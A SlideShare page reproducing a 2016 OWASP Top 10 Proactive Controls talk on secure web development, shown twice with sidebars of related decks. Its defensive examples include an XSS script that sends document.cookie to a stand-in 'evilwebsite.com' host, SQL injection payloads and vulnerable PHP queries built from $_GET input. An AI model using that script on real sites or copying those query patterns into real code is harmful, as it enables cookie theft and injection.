KA
Uploaded byKaty Anton
PPTX, PDF1,733 views

OWASP Top 10 Proactive Controls

The document discusses the OWASP Top 10 Proactive Controls aimed at mitigating common web application security risks such as injection, broken authentication, and sensitive data exposure. It emphasizes best practices such as verifying security early, parameterizing queries, and implementing strong authentication and access controls. Each control is elaborated with examples and methods to prevent specific vulnerabilities, highlighting the importance of security in application development.

Technology
Related topics:
Application Security

Embed presentation

Downloaded 44 times
OWASP Top 10 Proactive Controls Katy Anton @katyanton October 2016 1 PHPNW16
OWASP Top 10 Risks - 2013 A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 2
Katy Anton • Software development background • Certified Secure Software Lifecycle Professional (CSSLP) • Application Security Consultant @Veracode • OWASP Bristol Chapter Leader • Project Co-Leader for OWASP Top 10 Proactive Controls @katyanton https://www.linkedin.com/in/katyanton
Cyber attacks 2015 - 2016 4 Symfony implementation Disclosure of information SQL Injection
New Website 5
OWASP Application Security Verification Standard (ASVS) 6
C1. Verify for Security Early and Often 7 • Choose the level of security for your application • Security requirements and tests - OWASP ASVS • Verify for Security Early and Often (OWASP ZAP - continuous integration )
8 Proactive Control Risks prevented C1.Verify for security early and often All OWASP Top 10 Risks!
SQL injection example 9 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’; $sql = UPDATE user SET email=‘'; -- @owasp.org' WHERE id=‘1’; Becomes
C2. Parameterize Queries 10 Parameterize Queries prevent untrusted input from being interpreted as part of a SQL command.
PHP: <?php $stmt = $dbh->prepare(”Update users set email = $_GET[‘email’] where id=$id”); $stmt->execute(); Example of Query Parametrisation C2. Control: Data Access Layer 11 How not to do it !
C2: How NOT to $sql = ”Update users set email=$_GET[‘email’] where id=$id” This one string combines both the code and the input. SQL parser cannot differentiate between code and user input. 12
C2. Control: Data Access Layer 13 PHP: Query Parametrization - Correct Usage <?php $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email’); $stmt->bindParam(':user_id', $id); $stmt->execute();
14 Proactive Control Risks prevented C2.Parameterize Queries A1. Injection
XSS example 15 <script type=“text/javascript”> var adr = ‘http://evilwebsite.com/send.php?cakemonster =‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
C3. Encode Your Output 16
C3: Controls - Contextual Encoding Symfony 2+ Twig ZF2 ZendEscaper 17
18 Proactive Control Risks prevented C3. Encode Output A1. Injection A3. XSS
C4. Validate All Input 19
C4: Example of Validations 20 • GET / POST data (including hidden fields ) • File uploads • HTTP Headers • Cookies • Database
C4: Controls 21 PHP filter extension, available as standard since v5.2 Example of both validation and sanitisation : <?php $sanitised_url = filter_var($url, FILTER_SANITIZE_URL); if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) { echo “This is a valid URL.”; }
Input Validation Prevents 2nd Order SQL Injection Register form • Two users : “john” and “john’ - - “ • Username value “john’ –-” becomes the sql injection payload 22 john’- -Username Password
Change password form: Logged as john’ - - 2nd Order SQL Injection Example 23 Current Password New Password New Password
2nd Order SQL Injection Example UPDATE users SET password='123 ' WHERE username='john'--' and password=‘abc' UPDATE users SET password='123 ' WHERE username='john' 24 Becomes
25 Proactive Control Risks prevented C4. Validate All Input A1. Injection A3. XSS A10. Unvalidated redirects & forwards
New Website 26 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C2 Parametrize Queries
C5. Implement Identity and Authentication Control 27
C5: Best practices • Secure Password Storage • Multi-Factor Authentication • Secure Password Recovery Mechanism • Transmit sensitive data only over TLS (v1.2) • Error Messages • Prevent Brute-Force Attacks 28
C5. PHP Password storage • password_hash(“my_password”) • since php v5.5 • compatibility library for versions <5.5 29
C5. Password storage – How Not To $password=bcrypt([salt] + [password], work_factor); $loginkey =md5(lc([username]).”::”.lc([password])) Be consistent when storing sensitive data! 30
C5. Forgot Password Forgot password design: 1). Ask one or more security questions 2). Send the user a randomly generated token 3). Verify token in same web session. 4). Change password. Resources https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet 31
Error message for valid user Error messages = be identical on both HTTP and HTML. How not to do it ! Error message for not-registered user C5. Error messages 32
33 Proactive Control Risks prevented C5. Establish Identity and Authentication Controls A2. Broken Authentication and Session Management
C6. Implement Appropriate Access Controls 34
C6: Best Practices • Deny by default • Least privilege • Force all requests to go through access control checks • Check on the server when each function is accessed 35
C6: Role vs Resource based ACLs Resource based if (user.isPermitted("project:view:123")) { //show the project report button } else { //don't show the button } 36 Role based if (user.hasRole("Project Manager") ) { //show the project report button } else { //don't show the button } if (user.hasRole("Project Manager") || user.hasRole("Admin") ) { //show the project report button } else { //don't show the button }
37 Proactive Control Risks prevented C6: Implement Appropriate Access Controls A4. Insecure Direct Object References A7. Missing Function Level Access Control
C7. Protect Data 38
C7 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you visit is the right one 39 MITM Protection - HSTS • HTTPS + Strict Transport Security Header
C7 Controls: Data at rest 1. Algorithm •AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing 40
41 Proactive Control Risks prevented C7: Protect Data A6. Sensitive Data Exposure
New Website 42 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C2 Parametrize Queries
C8. Implement Logging and Intrusion Detection 43
44 Proactive Control Risks prevented C8.Logging and Intrusion Detection All OWASP Top 10 Risks!
C9. Leverage Security Frameworks and Libraries 45
C9: Examples • Framework with CSRF protection • Framework with XSS protection • ORM - SQL injection prevention • Vetted Cryptographic algorithm 46
C9: Best Practices  Use trusted sources  Low-coupling (Low-coupling == reduced attack surface)  Update regularly / replace 47
48 Proactive Control Risks prevented C9. Leverage Security All OWASP Top 10 Risks!
C10. Error and Exception Handling 49
C10: Best Practices  Centralised error handling  Verbose enough to explain the issue  Don’t leak critical information 50
51 Proactive Control Risks prevented C10. Error and Exception Handling All OWASP Top 10 Risks!
New Website 52 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C10 Error Handling C8 Logging C2 Parametrize Queries C9 Leverage security
It’s a Start To Secure Software by Default! 53
Reference OWASP Proactive Controls Project: https://www.owasp.org/index.php/OWASP _Proactive_Controls 54
Thank you 55

More Related Content

PPTX
Introduction to penetration testing
byNezar Alazzabi
 
PDF
Introduction to MITRE ATT&CK
byArpan Raval
 
PPTX
Pen Testing Explained
byRand W. Hirt
 
PPTX
Zero Trust Framework for Network Security​
byAlgoSec
 
PPT
Penetration Testing Basics
byRick Wanner
 
PDF
Api security-testing
byn|u - The Open Security Community
 
PPTX
Security testing fundamentals
byCygnet Infotech
 
PDF
Penetration testing web application web application (in) security
byNahidul Kibria
 
Introduction to penetration testing
byNezar Alazzabi
 
Introduction to MITRE ATT&CK
byArpan Raval
 
Pen Testing Explained
byRand W. Hirt
 
Zero Trust Framework for Network Security​
byAlgoSec
 
Penetration Testing Basics
byRick Wanner
 
Api security-testing
byn|u - The Open Security Community
 
Security testing fundamentals
byCygnet Infotech
 
Penetration testing web application web application (in) security
byNahidul Kibria
 

What's hot

PDF
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
byCrowdStrike
 
PPTX
Security testing
byKhizra Sammad
 
PPTX
Zero trust Architecture
byAddWeb Solution Pvt. Ltd.
 
PDF
Red Team Framework
by👀 Joe Gray
 
PDF
Upgrade Your SOC with Cortex XSOAR & Elastic SIEM
byElasticsearch
 
PDF
Peeling the Onion: Making Sense of the Layers of API Security
byMatt Tesauro
 
PDF
Web Application Penetration Testing
byPriyanka Aash
 
PPTX
McAfee SIEM solution
byhashnees
 
PPTX
Cloud Security Assessment Methods.pptx
byAdityaChawan4
 
PDF
Privilege escalation from 1 to 0 Workshop
byHossam .M Hamed
 
PDF
OWASP Top 10 Web Application Vulnerabilities
bySoftware Guru
 
PDF
OWASP API Security Top 10 - API World
by42Crunch
 
PDF
API Security Best Practices and Guidelines
byWSO2
 
PPTX
OWASP Top 10 2021 Presentation (Jul 2022)
byTzahiArabov
 
PDF
MITRE ATT&CK Framework
byn|u - The Open Security Community
 
PPTX
Rest API Security
byStormpath
 
PDF
OSINT: Open Source Intelligence - Rohan Braganza
byNSConclave
 
PPTX
Secure coding practices
byScott Hurrey
 
PPTX
Cyber Security roadmap.pptx
bySandeepK707540
 
PPTX
What is a secure enterprise architecture roadmap?
byUlf Mattsson
 
Proactive Threat Hunting: Game-Changing Endpoint Protection Beyond Alerting
byCrowdStrike
 
Security testing
byKhizra Sammad
 
Zero trust Architecture
byAddWeb Solution Pvt. Ltd.
 
Red Team Framework
by👀 Joe Gray
 
Upgrade Your SOC with Cortex XSOAR & Elastic SIEM
byElasticsearch
 
Peeling the Onion: Making Sense of the Layers of API Security
byMatt Tesauro
 
Web Application Penetration Testing
byPriyanka Aash
 
McAfee SIEM solution
byhashnees
 
Cloud Security Assessment Methods.pptx
byAdityaChawan4
 
Privilege escalation from 1 to 0 Workshop
byHossam .M Hamed
 
OWASP Top 10 Web Application Vulnerabilities
bySoftware Guru
 
OWASP API Security Top 10 - API World
by42Crunch
 
API Security Best Practices and Guidelines
byWSO2
 
OWASP Top 10 2021 Presentation (Jul 2022)
byTzahiArabov
 
MITRE ATT&CK Framework
byn|u - The Open Security Community
 
Rest API Security
byStormpath
 
OSINT: Open Source Intelligence - Rohan Braganza
byNSConclave
 
Secure coding practices
byScott Hurrey
 
Cyber Security roadmap.pptx
bySandeepK707540
 
What is a secure enterprise architecture roadmap?
byUlf Mattsson
 

Viewers also liked

PDF
2013 OWASP Top 10
bybilcorry
 
ODP
Top 10 Web Security Vulnerabilities
byCarol McDonald
 
PDF
OWASP Mobile Top 10
byNowSecure
 
PDF
State of OWASP 2015
bytmd800
 
PDF
OWASP Top 10 A4 – Insecure Direct Object Reference
byNarudom Roongsiriwong, CISSP
 
PPTX
RSA Europe 2013 OWASP Training
byJim Manico
 
PDF
Secure Software Development Adoption Strategy
byNarudom Roongsiriwong, CISSP
 
PDF
OWASP Top 10 Proactive Control 2016 (C5-C10)
byNarudom Roongsiriwong, CISSP
 
PDF
OWASP Day - OWASP Day - Lets secure!
byPrathan Phongthiproek
 
2013 OWASP Top 10
bybilcorry
 
Top 10 Web Security Vulnerabilities
byCarol McDonald
 
OWASP Mobile Top 10
byNowSecure
 
State of OWASP 2015
bytmd800
 
OWASP Top 10 A4 – Insecure Direct Object Reference
byNarudom Roongsiriwong, CISSP
 
RSA Europe 2013 OWASP Training
byJim Manico
 
Secure Software Development Adoption Strategy
byNarudom Roongsiriwong, CISSP
 
OWASP Top 10 Proactive Control 2016 (C5-C10)
byNarudom Roongsiriwong, CISSP
 
OWASP Day - OWASP Day - Lets secure!
byPrathan Phongthiproek
 

Similar to OWASP Top 10 Proactive Controls

PPTX
Owasp top-ten-mapping-2015-05-lwc
byKaty Anton
 
PPTX
The path of secure software by Katy Anton
byDevSecCon
 
PDF
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
PPTX
OWASP_Top_Ten_Proactive_Controls_v2.pptx
byFernandoVizer
 
PPTX
OWASP top 10-2013
bytmd800
 
PDF
Owasp top 10_openwest_2019
bySean Jackson
 
PDF
Making Web Development "Secure By Default"
byDuo Security
 
PDF
Coding Security: Code Mania 101
byNarudom Roongsiriwong, CISSP
 
PPT
Secure code practices
byHina Rawal
 
PDF
Security Ninjas: An Open Source Application Security Training Program
byOpenDNS
 
PDF
Owasp top 10 2013
byEdouard de Lansalut
 
PDF
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
byPhilippe Gamache
 
PDF
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
byPhilippe Gamache
 
PDF
Code securely
byMaksym Hopei
 
PDF
OWASP Top 10 Web Vulnerabilities from DCC 04/14
byChris Holwerda
 
PPTX
OWASP Top Ten 2017
byMichael Furman
 
PDF
owasp-top-10 presentation dhs ad health .
bySoner ÇELİK, CEH, PMP
 
PDF
Truetesters presents OWASP Top 10 Web Vulnerability
byTrueTesters
 
PDF
Security Awareness
byLucas Hendrich
 
PPTX
ASP.NET security vulnerabilities
byAleksandar Bozinovski
 
Owasp top-ten-mapping-2015-05-lwc
byKaty Anton
 
The path of secure software by Katy Anton
byDevSecCon
 
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
byFernandoVizer
 
OWASP top 10-2013
bytmd800
 
Owasp top 10_openwest_2019
bySean Jackson
 
Making Web Development "Secure By Default"
byDuo Security
 
Coding Security: Code Mania 101
byNarudom Roongsiriwong, CISSP
 
Secure code practices
byHina Rawal
 
Security Ninjas: An Open Source Application Security Training Program
byOpenDNS
 
Owasp top 10 2013
byEdouard de Lansalut
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
byPhilippe Gamache
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
byPhilippe Gamache
 
Code securely
byMaksym Hopei
 
OWASP Top 10 Web Vulnerabilities from DCC 04/14
byChris Holwerda
 
OWASP Top Ten 2017
byMichael Furman
 
owasp-top-10 presentation dhs ad health .
bySoner ÇELİK, CEH, PMP
 
Truetesters presents OWASP Top 10 Web Vulnerability
byTrueTesters
 
Security Awareness
byLucas Hendrich
 
ASP.NET security vulnerabilities
byAleksandar Bozinovski
 

Recently uploaded

PDF
Lab 1.2 Introduction to Azure Automation - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 
PDF
Lab 4.3 Automated security scans with Jenkins - 2nd Sight Lab Cloud Security ...
by2nd Sight Lab
 
PDF
Day 4 - Access, Deployments, and Monitoring - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Lab 4.4 More Cloud Logging and Monitoring - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Lab 1.1 Introduction to AWS Automation - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
The State of the Gen AI economy - 2025 - The Meliora Company
byClive Dickens
 
PDF
Workshop on Sustaining & Growing Open Source Communities - GAS2025
bySammy Fung
 
PPTX
Session 2 - Solving Unstructured & Complex Documents with UiPath IXP
byDianaGray10
 
PPTX
Building Agents in Microsoft Agent Framework.pptx
byUdaiappa Ramachandran
 
PDF
Machine Learning Primer: The Complete Crash Course (From Theory to Deployment)
byAeafat Ahmed Mubin
 
PDF
Raman Bhaumik - A Junior Software Developer
byRaman Bhaumik
 
PDF
Data Virtualization in Action: Scaling APIs and Apps with FME
bySafe Software
 
PDF
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
PDF
100 Insights After the 200th Issue of NewMind AI Journal
byNewMind AI
 
PDF
Fundamentals and Frontiers of Post Quantum Cryptography
byGokul Alex
 
PPTX
Emancipatory Information Retrieval: Radically Reorienting Information Retriev...
byBhaskar Mitra
 
PDF
Security Forum Sessions from Houston 2025 Event
byMark Simos
 
PDF
Lab 4.1 Cloud IAM - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PPTX
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
Lab 1.2 Introduction to Azure Automation - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Cross-Cultural Agile Development -Challenges and Strategies for Overcoming Them-
byTakashi Makino
 
Lab 4.3 Automated security scans with Jenkins - 2nd Sight Lab Cloud Security ...
by2nd Sight Lab
 
Day 4 - Access, Deployments, and Monitoring - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Lab 4.4 More Cloud Logging and Monitoring - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Lab 1.1 Introduction to AWS Automation - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
The State of the Gen AI economy - 2025 - The Meliora Company
byClive Dickens
 
Workshop on Sustaining & Growing Open Source Communities - GAS2025
bySammy Fung
 
Session 2 - Solving Unstructured & Complex Documents with UiPath IXP
byDianaGray10
 
Building Agents in Microsoft Agent Framework.pptx
byUdaiappa Ramachandran
 
Machine Learning Primer: The Complete Crash Course (From Theory to Deployment)
byAeafat Ahmed Mubin
 
Raman Bhaumik - A Junior Software Developer
byRaman Bhaumik
 
Data Virtualization in Action: Scaling APIs and Apps with FME
bySafe Software
 
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
100 Insights After the 200th Issue of NewMind AI Journal
byNewMind AI
 
Fundamentals and Frontiers of Post Quantum Cryptography
byGokul Alex
 
Emancipatory Information Retrieval: Radically Reorienting Information Retriev...
byBhaskar Mitra
 
Security Forum Sessions from Houston 2025 Event
byMark Simos
 
Lab 4.1 Cloud IAM - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Technology Consulting _ by Slidesgo.pptx
byfh82277
 

OWASP Top 10 Proactive Controls

  • 1.
    OWASP Top 10 ProactiveControls Katy Anton @katyanton October 2016 1 PHPNW16
  • 2.
    OWASP Top 10Risks - 2013 A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 2
  • 3.
    Katy Anton • Softwaredevelopment background • Certified Secure Software Lifecycle Professional (CSSLP) • Application Security Consultant @Veracode • OWASP Bristol Chapter Leader • Project Co-Leader for OWASP Top 10 Proactive Controls @katyanton https://www.linkedin.com/in/katyanton
  • 4.
    Cyber attacks 2015- 2016 4 Symfony implementation Disclosure of information SQL Injection
  • 5.
  • 6.
  • 7.
    C1. Verify forSecurity Early and Often 7 • Choose the level of security for your application • Security requirements and tests - OWASP ASVS • Verify for Security Early and Often (OWASP ZAP - continuous integration )
  • 8.
    8 Proactive Control Risksprevented C1.Verify for security early and often All OWASP Top 10 Risks!
  • 9.
    SQL injection example 9 $email=‘;-- @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’; $sql = UPDATE user SET email=‘'; -- @owasp.org' WHERE id=‘1’; Becomes
  • 10.
    C2. Parameterize Queries 10 ParameterizeQueries prevent untrusted input from being interpreted as part of a SQL command.
  • 11.
    PHP: <?php $stmt = $dbh->prepare(”Updateusers set email = $_GET[‘email’] where id=$id”); $stmt->execute(); Example of Query Parametrisation C2. Control: Data Access Layer 11 How not to do it !
  • 12.
    C2: How NOTto $sql = ”Update users set email=$_GET[‘email’] where id=$id” This one string combines both the code and the input. SQL parser cannot differentiate between code and user input. 12
  • 13.
    C2. Control: DataAccess Layer 13 PHP: Query Parametrization - Correct Usage <?php $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email’); $stmt->bindParam(':user_id', $id); $stmt->execute();
  • 14.
    14 Proactive Control Risksprevented C2.Parameterize Queries A1. Injection
  • 15.
    XSS example 15 <script type=“text/javascript”> varadr = ‘http://evilwebsite.com/send.php?cakemonster =‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
  • 16.
    C3. Encode YourOutput 16
  • 17.
    C3: Controls -Contextual Encoding Symfony 2+ Twig ZF2 ZendEscaper 17
  • 18.
    18 Proactive Control Risksprevented C3. Encode Output A1. Injection A3. XSS
  • 19.
  • 20.
    C4: Example ofValidations 20 • GET / POST data (including hidden fields ) • File uploads • HTTP Headers • Cookies • Database
  • 21.
    C4: Controls 21 PHP filterextension, available as standard since v5.2 Example of both validation and sanitisation : <?php $sanitised_url = filter_var($url, FILTER_SANITIZE_URL); if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) { echo “This is a valid URL.”; }
  • 22.
    Input Validation Prevents2nd Order SQL Injection Register form • Two users : “john” and “john’ - - “ • Username value “john’ –-” becomes the sql injection payload 22 john’- -Username Password
  • 23.
    Change password form: Loggedas john’ - - 2nd Order SQL Injection Example 23 Current Password New Password New Password
  • 24.
    2nd Order SQLInjection Example UPDATE users SET password='123 ' WHERE username='john'--' and password=‘abc' UPDATE users SET password='123 ' WHERE username='john' 24 Becomes
  • 25.
    25 Proactive Control Risksprevented C4. Validate All Input A1. Injection A3. XSS A10. Unvalidated redirects & forwards
  • 26.
    New Website 26 C1 Verify forSecurity Early and Often C3 Encode Data C4 Validate Input C2 Parametrize Queries
  • 27.
    C5. Implement Identityand Authentication Control 27
  • 28.
    C5: Best practices •Secure Password Storage • Multi-Factor Authentication • Secure Password Recovery Mechanism • Transmit sensitive data only over TLS (v1.2) • Error Messages • Prevent Brute-Force Attacks 28
  • 29.
    C5. PHP Passwordstorage • password_hash(“my_password”) • since php v5.5 • compatibility library for versions <5.5 29
  • 30.
    C5. Password storage– How Not To $password=bcrypt([salt] + [password], work_factor); $loginkey =md5(lc([username]).”::”.lc([password])) Be consistent when storing sensitive data! 30
  • 31.
    C5. Forgot Password Forgotpassword design: 1). Ask one or more security questions 2). Send the user a randomly generated token 3). Verify token in same web session. 4). Change password. Resources https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet 31
  • 32.
    Error message forvalid user Error messages = be identical on both HTTP and HTML. How not to do it ! Error message for not-registered user C5. Error messages 32
  • 33.
    33 Proactive Control Risksprevented C5. Establish Identity and Authentication Controls A2. Broken Authentication and Session Management
  • 34.
  • 35.
    C6: Best Practices •Deny by default • Least privilege • Force all requests to go through access control checks • Check on the server when each function is accessed 35
  • 36.
    C6: Role vsResource based ACLs Resource based if (user.isPermitted("project:view:123")) { //show the project report button } else { //don't show the button } 36 Role based if (user.hasRole("Project Manager") ) { //show the project report button } else { //don't show the button } if (user.hasRole("Project Manager") || user.hasRole("Admin") ) { //show the project report button } else { //don't show the button }
  • 37.
    37 Proactive Control Risksprevented C6: Implement Appropriate Access Controls A4. Insecure Direct Object References A7. Missing Function Level Access Control
  • 38.
  • 39.
    C7 Controls: Datain transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you visit is the right one 39 MITM Protection - HSTS • HTTPS + Strict Transport Security Header
  • 40.
    C7 Controls: Dataat rest 1. Algorithm •AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing 40
  • 41.
    41 Proactive Control Risksprevented C7: Protect Data A6. Sensitive Data Exposure
  • 42.
    New Website 42 C1 Verify forSecurity Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C2 Parametrize Queries
  • 43.
    C8. Implement Loggingand Intrusion Detection 43
  • 44.
    44 Proactive Control Risksprevented C8.Logging and Intrusion Detection All OWASP Top 10 Risks!
  • 45.
    C9. Leverage SecurityFrameworks and Libraries 45
  • 46.
    C9: Examples • Frameworkwith CSRF protection • Framework with XSS protection • ORM - SQL injection prevention • Vetted Cryptographic algorithm 46
  • 47.
    C9: Best Practices Use trusted sources  Low-coupling (Low-coupling == reduced attack surface)  Update regularly / replace 47
  • 48.
    48 Proactive Control Risksprevented C9. Leverage Security All OWASP Top 10 Risks!
  • 49.
    C10. Error andException Handling 49
  • 50.
    C10: Best Practices Centralised error handling  Verbose enough to explain the issue  Don’t leak critical information 50
  • 51.
    51 Proactive Control Risksprevented C10. Error and Exception Handling All OWASP Top 10 Risks!
  • 52.
    New Website 52 C1 Verify forSecurity Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C10 Error Handling C8 Logging C2 Parametrize Queries C9 Leverage security
  • 53.
    It’s a Start ToSecure Software by Default! 53
  • 54.
    Reference OWASP Proactive ControlsProject: https://www.owasp.org/index.php/OWASP _Proactive_Controls 54
  • 55.